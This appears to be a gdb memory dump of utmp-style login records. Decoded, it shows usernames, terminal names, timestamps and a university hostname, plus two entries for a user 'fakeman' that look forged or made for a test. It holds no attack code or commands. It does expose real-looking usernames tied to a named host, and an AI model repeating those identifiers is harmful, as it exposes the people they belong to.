0x33300:        0x00000000      0x00000000      0x00000000      0x62617a7a
0x33310:        0x00000000      0x00000000      0x00000000      0x00000000
0x33320:        0x00000000      0x00000000      0x00000000      0x2f320000
0x33330:        0x7074732f      0x32000000      0x00000000      0x00000000
0x33340:        0x00000000      0x00000000      0x00000000      0x00000000
0x33350:        0x000003ce      0x00080000      0x000007a8      0x5438d560
0x33360:        0x00000000      0x00000000      0x00000000      0x00000000
0x33370:        0x00000000      0x00000000      0x00000000      0x000b3a70
0x33380:        0x74732f31      0x3a532e30      0x00000000      0x00000000
0x33390:        0x00000000      0x00000000      0x00000000      0x00000000
0x333a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33400:        0x00000000      0x00000000      0x00000000      0x00000000
0x33410:        0x00000000      0x00000000      0x00000000      0x00000000
0x33420:        0x00000000      0x00000000      0x00000000      0x00000000
0x33430:        0x00000000      0x00000000      0x00000000      0x00000000
0x33440:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33450:        0x00000000      0x00000000      0x00000000      0x00000000
0x33460:        0x00000000      0x00000000      0x00000000      0x00000000
0x33470:        0x00000000      0x00000000      0x00000000      0x000000a0
0x33480:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x33490:        0x00000000      0x00000000      0x00000000      0x00000000
0x334a0:        0x2f330000      0x7074732f      0x33000000      0x00000000
0x334b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x334c0:        0x00000000      0x00004027      0x00080000      0x000007a8
0x334d0:        0x543f3195      0x00000000      0x00000000      0x00000000
0x334e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x334f0:        0x000b3a70      0x74732f37      0x3a532e30      0x00000000
0x33500:        0x00000000      0x00000000      0x00000000      0x00000000
0x33510:        0x00000000      0x00000000      0x00000000      0x00000000
0x33520:        0x00000000      0x00000000      0x00000000      0x00000000
0x33530:        0x00000000      0x00000000      0x00000000      0x00000000
0x33540:        0x00000000      0x00000000      0x00000000      0x00000000
0x33550:        0x00000000      0x00000000      0x00000000      0x00000000
0x33560:        0x00000000      0x00000000      0x00000000      0x00000000
0x33570:        0x00000000      0x00000000      0x00000000      0x00000000
0x33580:        0x00000000      0x00000000      0x00000000      0x00000000
0x33590:        0x00000000      0x00000000      0x00000000      0x00000000
0x335a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x335b0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x335c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x335d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x335e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x335f0:        0x000000a0      0x66616b65      0x6d616e00      0x00000000
0x33600:        0x00000000      0x00000000      0x00000000      0x00000000
0x33610:        0x00000000      0x61616161      0x7074732f      0x2f2f3300
0x33620:        0x00000000      0x00000000      0x00000000      0x00000000
0x33630:        0x00000000      0x00000000      0x00002328      0x0008000a
0x33640:        0x000107a8      0x000186a0      0x00002710      0x00000004
0x33650:        0x00000000      0x00000000      0x00000000      0x00000000
0x33660:        0x00000000      0x00056261      0x7a7a0000      0x00000000
0x33670:        0x00000000      0x00000000      0x00000000      0x00000000
0x33680:        0x00000000      0x00000000      0x00000000      0x00000000
0x33690:        0x00000000      0x00000000      0x00000000      0x00000000
0x336a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33700:        0x00000000      0x00000000      0x00000000      0x00000000
0x33710:        0x00000000      0x00000000      0x00000000      0x00000000
0x33720:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33730:        0x00000000      0x00000000      0x00000000      0x00000000
0x33740:        0x00000000      0x00000000      0x00000000      0x00000000
0x33750:        0x00000000      0x00000000      0x00000000      0x00000000
0x33760:        0x00000000      0x00000050      0x66616b65      0x6d616e00
0x33770:        0x00000000      0x00000000      0x00000000      0x00000000
0x33780:        0x00000000      0x00000000      0x61616162      0x7074732f
0x33790:        0x2f2f3300      0x00000000      0x00000000      0x00000000
0x337a0:        0x00000000      0x00000000      0x00000000      0x00002328
0x337b0:        0x0008000a      0x000107a8      0x000186a0      0x00002710
0x337c0:        0x00000004      0x00000000      0x00000000      0x00000000
0x337d0:        0x00000000      0x00000000      0x00056261      0x7a7a0000
0x337e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x337f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33800:        0x00000000      0x00000000      0x00000000      0x00000000
0x33810:        0x00000000      0x00000000      0x00000000      0x00000000
0x33820:        0x00000000      0x00000000      0x00000000      0x00000000
0x33830:        0x00000000      0x00000000      0x00000000      0x00000000
0x33840:        0x00000000      0x00000000      0x00000000      0x00000000
0x33850:        0x00000000      0x00000000      0x00000000      0x00000000
0x33860:        0x00000000      0x00000000      0x00000000      0x00000000
0x33870:        0x00000000      0x00000000      0x00000000      0x00000000
0x33880:        0x00000000      0x00000000      0x00000000      0x00000000
0x33890:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x338a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x338b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x338c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x338d0:        0x00000000      0x00000000      0x00000050      0x00000000
0x338e0:        0x00000048      0x7a736d6f      0x6e000000      0x00000000
0x338f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33900:        0x00000000      0x504d3130      0x00000000      0x00000000
0x33910:        0x00000000      0x00000000      0x00000000      0x00000000
0x33920:        0x00000000      0x00000000      0x00000187      0x00060000
0x33930:        0x00000101      0x5144b175      0x00000000      0x00000000
0x33940:        0x00000000      0x00000000      0x00000000      0x00000000
0x33950:        0x00000000      0x00000000      0x00000000      0x00000000
0x33960:        0x00000000      0x00000000      0x00000000      0x00000000
0x33970:        0x00000000      0x00000000      0x00000000      0x00000000
0x33980:        0x00000000      0x00000000      0x00000000      0x00000000
0x33990:        0x00000000      0x00000000      0x00000000      0x00000000
0x339a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x339f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a00:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33a10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a30:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a40:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a50:        0x00000000      0x000000a4      0x62617a7a      0x00000000
0x33a60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33a70:        0x00000000      0x00000000      0x74732f31      0x7074732f
0x33a80:        0x31000000      0x00000000      0x00000000      0x00000000
0x33a90:        0x00000000      0x00000000      0x00000000      0x0000023a
0x33aa0:        0x00070000      0x00000000      0x54554c5e      0x0006b034
0x33ab0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ac0:        0x00000000      0x00000000      0x000f766d      0x37322e63
0x33ad0:        0x732e756d      0x622e6564      0x75000000      0x00000000
0x33ae0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33af0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b00:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b30:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b40:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b50:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b70:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33b80:        0x00000000      0x00000000      0x00000000      0x00000000
0x33b90:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ba0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33bb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33bc0:        0x00000000      0x00000000      0x00000018      0x62617a7a
0x33bd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33be0:        0x00000000      0x00000000      0x00000000      0x74732f32
0x33bf0:        0x7074732f      0x32000000      0x00000000      0x00000000
0x33c00:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c10:        0x000003db      0x00070000      0x00000000      0x54556b71
0x33c20:        0x00007555      0x00000000      0x00000000      0x00000000
0x33c30:        0x00000000      0x00000000      0x00000000      0x000f766d
0x33c40:        0x37322e63      0x732e756d      0x622e6564      0x75000000
0x33c50:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c70:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c80:        0x00000000      0x00000000      0x00000000      0x00000000
0x33c90:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ca0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33cb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33cc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33cd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ce0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33cf0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d00:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d30:        0x00000000      0x00000000      0x00000000      0x00000018
0x33d40:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x33d50:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d60:        0x74732f33      0x7074732f      0x33000000      0x00000000
0x33d70:        0x00000000      0x00000000      0x00000000      0x00000000
0x33d80:        0x00000000      0x0000041a      0x00070000      0x00000000
0x33d90:        0x54556dfb      0x000a22b2      0x00000000      0x00000000
0x33da0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33db0:        0x000f766d      0x37322e63      0x732e756d      0x622e6564
0x33dc0:        0x75000000      0x00000000      0x00000000      0x00000000
0x33dd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33de0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33df0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e00:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e30:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e40:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e50:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33e60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e70:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e80:        0x00000000      0x00000000      0x00000000      0x00000000
0x33e90:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ea0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33eb0:        0x000000d8      0x62617a7a      0x00000000      0x00000000
0x33ec0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ed0:        0x00000000      0x74732f34      0x7074732f      0x34000000
0x33ee0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ef0:        0x00000000      0x00000000      0x000003b9      0x00080000
0x33f00:        0x00000000      0x544b9876      0x000a2490      0x00000000
0x33f10:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f20:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f30:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f40:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f50:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f60:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f70:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f80:        0x00000000      0x00000000      0x00000000      0x00000000
0x33f90:        0x00000000      0x00000000      0x00000000      0x00000000
0x33fa0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33fb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33fc0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33fd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33fe0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33ff0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34000:        0x00000000      0x00000000      0x00000000      0x00000000
0x34010:        0x00000000      0x00000000      0x00000000      0x00000000
0x34020:        0x00000000      0x00000000      0x62617a7a      0x00000000
0x34030:        0x00000000      0x00000000      0x00000000      0x00000000
0x34040:        0x00000000      0x00000000      0x74732f35      0x7074732f
0x34050:        0x35000000      0x00000000      0x00000000      0x00000000
0x34060:        0x00000000      0x00000000      0x00000000      0x00007467
0x34070:        0x00080000      0x00000000      0x544b6439      0x0001fa71
0x34080:        0x00000000      0x00000000      0x00000000      0x00000000
0x34090:        0x00000000      0x00000000      0x00000000      0x00000000
0x340a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34100:        0x00000000      0x00000000      0x00000000      0x00000000
0x34110:        0x00000000      0x00000000      0x00000000      0x00000000
0x34120:        0x00000000      0x00000000      0x00000000      0x00000000
0x34130:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34140:        0x00000000      0x00000000      0x00000000      0x00000000
0x34150:        0x00000000      0x00000000      0x00000000      0x00000000
0x34160:        0x00000000      0x00000000      0x00000000      0x00000000
0x34170:        0x00000000      0x00000000      0x00000000      0x00000000
0x34180:        0x00000000      0x00000000      0x00000000      0x00000000
0x34190:        0x00000000      0x00000000      0x0000002f      0x62617a7a
0x341a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x341b0:        0x00000000      0x00000000      0x00000000      0x74732f36
0x341c0:        0x7074732f      0x36000000      0x00000000      0x00000000
0x341d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x341e0:        0x00007497      0x00080000      0x00000000      0x544b6438
0x341f0:        0x000e757d      0x00000000      0x00000000      0x00000000
0x34200:        0x00000000      0x00000000      0x00000000      0x00000000
0x34210:        0x00000000      0x00000000      0x00000000      0x00000000
0x34220:        0x00000000      0x00000000      0x00000000      0x00000000
0x34230:        0x00000000      0x00000000      0x00000000      0x00000000
0x34240:        0x00000000      0x00000000      0x00000000      0x00000000
0x34250:        0x00000000      0x00000000      0x00000000      0x00000000
0x34260:        0x00000000      0x00000000      0x00000000      0x00000000
0x34270:        0x00000000      0x00000000      0x00000000      0x00000000
0x34280:        0x00000000      0x00000000      0x00000000      0x00000000
0x34290:        0x00000000      0x00000000      0x00000000      0x00000000
0x342a0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x342b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34300:        0x00000000      0x00000000      0x00000000      0x0000002f
0x34310:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x34320:        0x00000000      0x00000000      0x00000000      0x00000000
0x34330:        0x74732f37      0x7074732f      0x37000000      0x00000000
0x34340:        0x00000000      0x00000000      0x00000000      0x00000000
0x34350:        0x00000000      0x000074a9      0x00080000      0x00000000
0x34360:        0x544b6438      0x000ba288      0x00000000      0x00000000
0x34370:        0x00000000      0x00000000      0x00000000      0x00000000
0x34380:        0x00000000      0x00000000      0x00000000      0x00000000
0x34390:        0x00000000      0x00000000      0x00000000      0x00000000
0x343a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34400:        0x00000000      0x00000000      0x00000000      0x00000000
0x34410:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34420:        0x00000000      0x00000000      0x00000000      0x00000000
0x34430:        0x00000000      0x00000000      0x00000000      0x00000000
0x34440:        0x00000000      0x00000000      0x00000000      0x00000000
0x34450:        0x00000000      0x00000000      0x00000000      0x00000000
0x34460:        0x00000000      0x00000000      0x00000000      0x00000000
0x34470:        0x00000000      0x00000000      0x00000000      0x00000000
0x34480:        0x0000002f      0x62617a7a      0x00000000      0x00000000
0x34490:        0x00000000      0x00000000      0x00000000      0x00000000
0x344a0:        0x00000000      0x74732f38      0x7074732f      0x38000000
0x344b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x344c0:        0x00000000      0x00000000      0x000074d9      0x00080000
0x344d0:        0x00000000      0x544b6438      0x0008c36e      0x00000000
0x344e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x344f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34500:        0x00000000      0x00000000      0x00000000      0x00000000
0x34510:        0x00000000      0x00000000      0x00000000      0x00000000
0x34520:        0x00000000      0x00000000      0x00000000      0x00000000
0x34530:        0x00000000      0x00000000      0x00000000      0x00000000
0x34540:        0x00000000      0x00000000      0x00000000      0x00000000
0x34550:        0x00000000      0x00000000      0x00000000      0x00000000
0x34560:        0x00000000      0x00000000      0x00000000      0x00000000
0x34570:        0x00000000      0x00000000      0x00000000      0x00000000
0x34580:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34590:        0x00000000      0x00000000      0x00000000      0x00000000
0x345a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345f0:        0x00000000      0x0000002f      0x62617a7a      0x00000000
0x34600:        0x00000000      0x00000000      0x00000000      0x00000000
0x34610:        0x00000000      0x00000000      0x74732f39      0x7074732f
0x34620:        0x39000000      0x00000000      0x00000000      0x00000000
0x34630:        0x00000000      0x00000000      0x00000000      0x000074f3
0x34640:        0x00080000      0x00000000      0x544b6438      0x0002c7ad
0x34650:        0x00000000      0x00000000      0x00000000      0x00000000
0x34660:        0x00000000      0x00000000      0x00000000      0x00000000
0x34670:        0x00000000      0x00000000      0x00000000      0x00000000
0x34680:        0x00000000      0x00000000      0x00000000      0x00000000
0x34690:        0x00000000      0x00000000      0x00000000      0x00000000
0x346a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346f0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34700:        0x00000000      0x00000000      0x00000000      0x00000000
0x34710:        0x00000000      0x00000000      0x00000000      0x00000000
0x34720:        0x00000000      0x00000000      0x00000000      0x00000000
0x34730:        0x00000000      0x00000000      0x00000000      0x00000000
0x34740:        0x00000000      0x00000000      0x00000000      0x00000000
0x34750:        0x00000000      0x00000000      0x00000000      0x00000000
0x34760:        0x00000000      0x00000000      0x0000002f      0x62617a7a
0x34770:        0x00000000      0x00000000      0x00000000      0x00000000
0x34780:        0x00000000      0x00000000      0x00000000      0x732f3130
0x34790:        0x7074732f      0x31300000      0x00000000      0x00000000
0x347a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347b0:        0x00007501      0x00080000      0x00000000      0x544b6437
0x347c0:        0x000cbf95      0x00000000      0x00000000      0x00000000
0x347d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34800:        0x00000000      0x00000000      0x00000000      0x00000000
0x34810:        0x00000000      0x00000000      0x00000000      0x00000000
0x34820:        0x00000000      0x00000000      0x00000000      0x00000000
0x34830:        0x00000000      0x00000000      0x00000000      0x00000000
0x34840:        0x00000000      0x00000000      0x00000000      0x00000000
0x34850:        0x00000000      0x00000000      0x00000000      0x00000000
0x34860:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34870:        0x00000000      0x00000000      0x00000000      0x00000000
0x34880:        0x00000000      0x00000000      0x00000000      0x00000000
0x34890:        0x00000000      0x00000000      0x00000000      0x00000000
0x348a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348d0:        0x00000000      0x00000000      0x00000000      0x0000002f
0x348e0:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x348f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34900:        0x732f3131      0x7074732f      0x31310000      0x00000000
0x34910:        0x00000000      0x00000000      0x00000000      0x00000000
0x34920:        0x00000000      0x00007527      0x00080000      0x00000000
0x34930:        0x544b6431      0x000def0a      0x00000000      0x00000000
0x34940:        0x00000000      0x00000000      0x00000000      0x00000000
0x34950:        0x00000000      0x00000000      0x00000000      0x00000000
0x34960:        0x00000000      0x00000000      0x00000000      0x00000000
0x34970:        0x00000000      0x00000000      0x00000000      0x00000000
0x34980:        0x00000000      0x00000000      0x00000000      0x00000000
0x34990:        0x00000000      0x00000000      0x00000000      0x00000000
0x349a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349d0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x349e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a50:        0x00000000      0x6a6b7269      0x63680000      0x00000000
0x34a60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a70:        0x00000000      0x732f3132      0x7074732f      0x31320000
0x34a80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a90:        0x00000000      0x00000000      0x0000083d      0x00080000
0x34aa0:        0x00000000      0x527021bc      0x0001e605      0x00000000
0x34ab0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ac0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ad0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ae0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34af0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b40:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34b50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ba0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34bb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34bc0:        0x00000000      0x00000000      0x64656d69      0x6a61636b
0x34bd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34be0:        0x00000000      0x00000000      0x732f3133      0x7074732f
0x34bf0:        0x31330000      0x00000000      0x00000000      0x00000000
0x34c00:        0x00000000      0x00000000      0x00000000      0x000006b2
0x34c10:        0x00080000      0x00000000      0x52701251      0x00074603
0x34c20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ca0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cb0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34cc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ce0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cf0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d30:        0x00000000      0x00000000      0x00000000      0x61676172
0x34d40:        0x61790000      0x00000000      0x00000000      0x00000000
0x34d50:        0x00000000      0x00000000      0x00000000      0x732f3134
0x34d60:        0x7074732f      0x31340000      0x00000000      0x00000000
0x34d70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d80:        0x00001603      0x00080000      0x00000000      0x52524378
0x34d90:        0x00032ffd      0x00000000      0x00000000      0x00000000
0x34da0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34db0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34dc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34dd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34de0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34df0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e20:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34e30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ea0:        0x00000000      0x00000000      0x00000000      0x0000002f
0x34eb0:        0x6b657662      0x30303031      0x00000000      0x00000000
0x34ec0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ed0:        0x732f3135      0x7074732f      0x31350000      0x00000000
0x34ee0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ef0:        0x00000000      0x0000156f      0x00080000      0x00000000
0x34f00:        0x525241c4      0x00052c9f      0x00000000      0x00000000
0x34f10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f90:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x34fa0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fe0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ff0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35000:        0x00000000      0x00000000      0x00000000      0x00000000
0x35010:        0x00000000      0x00000000      0x00000000      0x00000000
0x35020:        0x00000000      0x64687572      0x6c627574      0x00000000
0x35030:        0x00000918      0x00000000      0x00000000      0x00000000
